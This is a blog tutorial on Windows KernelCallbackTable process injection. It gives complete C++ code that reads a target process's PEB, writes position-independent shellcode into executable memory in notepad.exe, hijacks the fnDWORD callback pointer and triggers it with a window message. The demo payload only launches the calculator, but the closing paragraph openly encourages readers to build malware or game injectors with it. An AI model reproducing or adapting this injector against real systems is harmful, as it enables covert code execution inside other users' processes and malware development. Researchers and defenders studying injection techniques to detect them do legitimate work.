Arbitrary Remote Process Code Execution Using KernelCallbackTable
Some Information About Technique
Recently I was researching new code execution techniques to use in my own projects and I came across the KernelCallbackTable injection technique.
This technique, which is usually used in malware production, allows us to inject our own malicious shellcode into a victim program and manipulate the code flow of this program and run our own malicious codes in the background.
In this article, I will show you how to access the KernelCallbackTable and how you can manipulate it.
When I researched this technique, I saw that it was previously used in malware called Lazarus and FinSpy.
But I was surprised that such an easy and effective technique is rarely used these days.
Pros and Cons
- Pros
- Easy to use
- Cons
- User32.dll must be loaded in victim process to intercept KernelCallbackTable.
The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32. dll is loaded.
Lets Take a Look at Process Environment Block
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
struct _PEB64
{
UCHAR InheritedAddressSpace; //0x0
UCHAR ReadImageFileExecOptions; //0x1
UCHAR BeingDebugged; //0x2
union
{
UCHAR BitField; //0x3
struct
{
UCHAR ImageUsesLargePages:1; //0x3
UCHAR IsProtectedProcess:1; //0x3
UCHAR IsImageDynamicallyRelocated:1; //0x3
UCHAR SkipPatchingUser32Forwarders:1; //0x3
UCHAR IsPackagedProcess:1; //0x3
UCHAR IsAppContainer:1; //0x3
UCHAR IsProtectedProcessLight:1; //0x3
UCHAR IsLongPathAwareProcess:1; //0x3
};
};
UCHAR Padding0[4]; //0x4
ULONGLONG Mutant; //0x8
ULONGLONG ImageBaseAddress; //0x10
ULONGLONG Ldr; //0x18
ULONGLONG ProcessParameters; //0x20
ULONGLONG SubSystemData; //0x28
ULONGLONG ProcessHeap; //0x30
ULONGLONG FastPebLock; //0x38
ULONGLONG AtlThunkSListPtr; //0x40
ULONGLONG IFEOKey; //0x48
union
{
ULONG CrossProcessFlags; //0x50
struct
{
ULONG ProcessInJob:1; //0x50
ULONG ProcessInitializing:1; //0x50
ULONG ProcessUsingVEH:1; //0x50
ULONG ProcessUsingVCH:1; //0x50
ULONG ProcessUsingFTH:1; //0x50
ULONG ProcessPreviouslyThrottled:1; //0x50
ULONG ProcessCurrentlyThrottled:1; //0x50
ULONG ProcessImagesHotPatched:1; //0x50
ULONG ReservedBits0:24; //0x50
};
};
UCHAR Padding1[4]; //0x54
union
{
ULONGLONG KernelCallbackTable; //0x58
ULONGLONG UserSharedInfoPtr; //0x58
};
// strimmed
According to Vergilius KernelCallbackTable is located at PEB + 0x58
This table provides us any array of graphic functions which we can replace. These functions are executed once their corresponding message is processed.
For example on my PoC I will target the function fnDWORD
inside this array. fnDWORD
is typically used to handle messages that pass or require a DWORD
value as part of their message parameters. Many Windows messages include or rely on DWORD
values. For example, messages like WM_GETTEXTLENGTH
, WM_COMMAND
, and others use or expect DWORD
as part of their parameters, either in WPARAM
or LPARAM
. I will use WM_COMMAND
message since WPARAM
could be treated as a DWORD
value according to MSDN because WM_COMMAND
message’s WPARAM
is divided into 2 WORD
parts. See MSDN Remarks
PoC
In my PoC, I will target notepad.exe
. First I will open a handle to victim process with PROCESS_QUERY_INFORMATION
and with that handle I will call NtQueryInformationProcess
to retrieve PEB address from PROCESS_BASIC_INFORMATION
structure. From this PEB struct I will retrieve KernelCallbackTable and in this table I will hook 3rd function which is fnDWORD
. Then when WM_COMMAND message is processed to victim window it will trigger fnDWORD
in victim process which will execute my shellcode later.
Shellcode
My shellcode is responsible for calling CreateProcessA and launching calculator.exe
. I like the way I’m mapping my shellcode because it’s a cleaner and more reliable way to execute a payload on a remote target. However, you can’t pass arguments directly to the function. You should also map the arguments to the target process and make them accessible to the function, as I did in my proof of concept (PoC)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#pragma pack(push, 1)
struct shellcode_args {
char calculator_path[60];
STARTUPINFO si;
PROCESS_INFORMATION pi;
PVOID create_process;
PVOID wait_for_single_object;
PVOID closehandle;
BOOL completed = FALSE;
};
#pragma pack(pop)
#pragma runtime_checks( "", off )
#pragma optimize( "", off )
void shellcode() {
shellcode_args* args = (shellcode_args*)0xF1F1F1F1F1F1F1F1;
LPCSTR calculatorPath = args->calculator_path;
create_process_template f1 = create_process_template(args->create_process);
wait_for_single_object_template f2 = wait_for_single_object_template(args->wait_for_single_object);
closehandle_template f3 = closehandle_template(args->closehandle);
f1(calculatorPath, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &args->si, &args->pi);
f2(args->pi.hProcess, INFINITE);
args->completed = TRUE;
f3(args->pi.hProcess);
f3(args->pi.hThread);
return;
};
void shellcode_end() { };
#pragma runtime_checks( "", on )
#pragma optimize( "", on )
Retrieving PEB Address of Remote Process
It’s a piece of cake as you can do it by calling the Windows API NtQueryInformationProcess.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
DWORD64 GetRemotePEB(HANDLE handle) {
HMODULE hNTDLL = GetModuleHandleA("ntdll.dll");
if (!hNTDLL)
return 0;
FARPROC fpNtQueryInformationProcess = GetProcAddress
(
hNTDLL,
"NtQueryInformationProcess"
);
if (!fpNtQueryInformationProcess)
return 0;
NtQueryInformationProcess ntQueryInformationProcess =
(NtQueryInformationProcess)fpNtQueryInformationProcess;
PROCESS_BASIC_INFORMATION* pBasicInfo =
new PROCESS_BASIC_INFORMATION();
DWORD dwReturnLength = 0;
ntQueryInformationProcess
(
handle,
0,
pBasicInfo,
sizeof(PROCESS_BASIC_INFORMATION),
&dwReturnLength
);
return DWORD64(pBasicInfo->PebBaseAddress);
}
Dispatching Message to Windows
As I mentioned in my article, I will hook the fnDWORD function from the KernelCallbackTable and send a message of type WM_COMMAND since its wParam can be treated as a DWORD, which will later trigger our payload.
1
2
3
4
5
6
7
8
9
10
11
12
13
DWORD victim_pid{ NULL };
inline BOOL CALLBACK EnumWindowFunc(HWND hwnd, LPARAM param)
{
DWORD pid = 0;
GetWindowThreadProcessId(hwnd, &pid);
if (pid == victim_pid)
{
SendMessageTimeoutW(hwnd, WM_NULL, 0, 0, SMTO_NORMAL, 1, nullptr);
return FALSE;
}
return TRUE;
}
Fullcode
I’m first getting remote PEB
address and calculating my shellcode
size simply by subtracting shellcode
address from shellcode_end
address.
Whole Program Optimization must be turned off to get the correct shellcode size, as compilers can shift the function location due to optimization.
Then I patch my shellcode to give it the ability to read the arguments mapped to the target process. You might also wonder why I passed arguments and function pointers. In assembly language, their addresses can be relative to the RIP pointer, meaning they wouldn’t be the same in the target process, which would result in incorrect function addresses and ultimately lead to a crash. This also applies to local function variables and arguments.
We overcome this issue by patching shellcode and passing the addresses of our mapped arguments/variables in the target process instead.
Later, we trigger a WM_COMMAND
message in the target process, which calls fnDWORD
and finally executes our shellcode because we hijacked its pointer in the KernelCallbackTable.
When our shellcode executes, it calls CreateProcessA
with the given parameters and then sets args.completed
to TRUE
to indicate that the job is finished.
In the end, we can restore the fnDWORD
pointer and free the memory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
#include <Windows.h>
#include <stdio.h>
int main()
{
// retrieve our victim's window handle.
HWND victim_hwnd = FindWindowA("Notepad", NULL);
// retrieve our victim's process id.
GetWindowThreadProcessId(victim_hwnd, &victim_pid);
// open handle to victim
HANDLE victim_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, victim_pid);
// query victim process to retrieve peb address
uintptr_t victim_peb = GetRemotePEB(victim_handle);
// read kernelcallback table address which is at peb + 0x58
uintptr_t kct_address{ 0 };
SIZE_T number_of_bytes_read{ 0 };
BOOL result = ReadProcessMemory(victim_handle, PVOID(victim_peb + 0x58), &kct_address, sizeof uintptr_t, &number_of_bytes_read);
if (!result || !kct_address)
{
return FALSE;
}
// fnDWORD function is located at table 0x10 which is 3rd of the table.
uintptr_t function_to_hook = kct_address + 0x10;
uintptr_t org_function;
ReadProcessMemory(victim_handle, PVOID(function_to_hook), &org_function, 8, &number_of_bytes_read);
// get size of our shellcode.
UINT32 shellcode_length = DWORD64(shellcode_end) - DWORD64(shellcode);
// allocate remote memory for our shellcode and map on it.
PVOID remote_shellcode = VirtualAllocEx(victim_handle, NULL, shellcode_length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remote_shellcode)
{
return false;
}
// allocate local memory for our shellcode.
PBYTE local_shellcode = (PBYTE)VirtualAlloc(NULL, shellcode_length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!local_shellcode)
{
return false;
}
// prepare our args and map it to victim memory.
shellcode_args args;
memset(&args, 0, sizeof shellcode_args);
const char* path_buffer = "C:\\Windows\\System32\\calc.exe";
memcpy(args.calculator_path, path_buffer, 60);
memset(&args.si, 0, sizeof args.si);
memset(&args.pi, 0, sizeof args.pi);
args.closehandle = (PVOID)CloseHandle;
args.create_process = (PVOID)CreateProcessA;
args.wait_for_single_object = (PVOID)WaitForSingleObject;
PVOID remote_args = VirtualAllocEx(victim_handle, NULL, sizeof shellcode_args, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!remote_args)
{
printf("[ERROR]%X \n", GetLastError());
return FALSE;
}
SIZE_T number_of_bytes_written{ 0 };
result = WriteProcessMemory(victim_handle, remote_args, &args, sizeof shellcode_args, &number_of_bytes_written);
if (!result)
{
printf("[ERROR]%X \n", GetLastError());
return FALSE;
}
// copy our shellcode to our local buffer and then patch it
memset(local_shellcode, NULL, shellcode_length);
memcpy(local_shellcode, shellcode, shellcode_length);
for (size_t i = 0; i < shellcode_length; i++)
{
// Write our args address
if (*(DWORD64*)&(local_shellcode[i]) == 0xF1F1F1F1F1F1F1F1)
{
*(DWORD64*)&(local_shellcode[i]) = DWORD64(remote_args);
break;
}
}
result = WriteProcessMemory(victim_handle, remote_shellcode, local_shellcode, shellcode_length, &number_of_bytes_written);
if (!result)
{
printf("[ERROR]%X \n", GetLastError());
return FALSE;
}
BOOL resp;
DWORD oldP;
resp = VirtualProtectEx(victim_handle, (PVOID)(function_to_hook), 0x1000, PAGE_READWRITE, &oldP);
if (!resp)
{
printf("[ERROR]%X \n", GetLastError());
return FALSE;
}
Sleep(100);
resp = WriteProcessMemory(victim_handle, (PVOID)(function_to_hook), &remote_shellcode, sizeof uintptr_t, &number_of_bytes_written);
if (!resp)
{
printf("[ERROR]%X \n", GetLastError());
return FALSE;
}
//dispatch window message and trigger our payload
EnumWindows(EnumWindowFunc, 0);
// wait for response from our shellcode
while (!args.completed)
{
ReadProcessMemory(victim_handle, remote_args, &args, sizeof(args), &number_of_bytes_read);
}
//restore pointer
resp = WriteProcessMemory(victim_handle, (PVOID)(function_to_hook), &org_function, sizeof uintptr_t, &number_of_bytes_written);
printf("Finished.\n");
//free memory
VirtualFreeEx(victim_handle, remote_args, sizeof shellcode_args, MEM_FREE);
VirtualFreeEx(victim_handle, remote_shellcode, shellcode_length, MEM_FREE);
VirtualFree(local_shellcode, shellcode_length, MEM_FREE);
system("pause");
return TRUE;
}
Demonstration
Conclusion
That’s it! That’s what I wanted to show you. There’s always a vulnerability when you come up with different ideas. Just think outside the box and break your chains. You can use the code execution vulnerability I showed above to do anything you want. You can make an injector for a game you like or you can make a malware.
That’s all for now. See you on my next article
Comments powered by Disqus.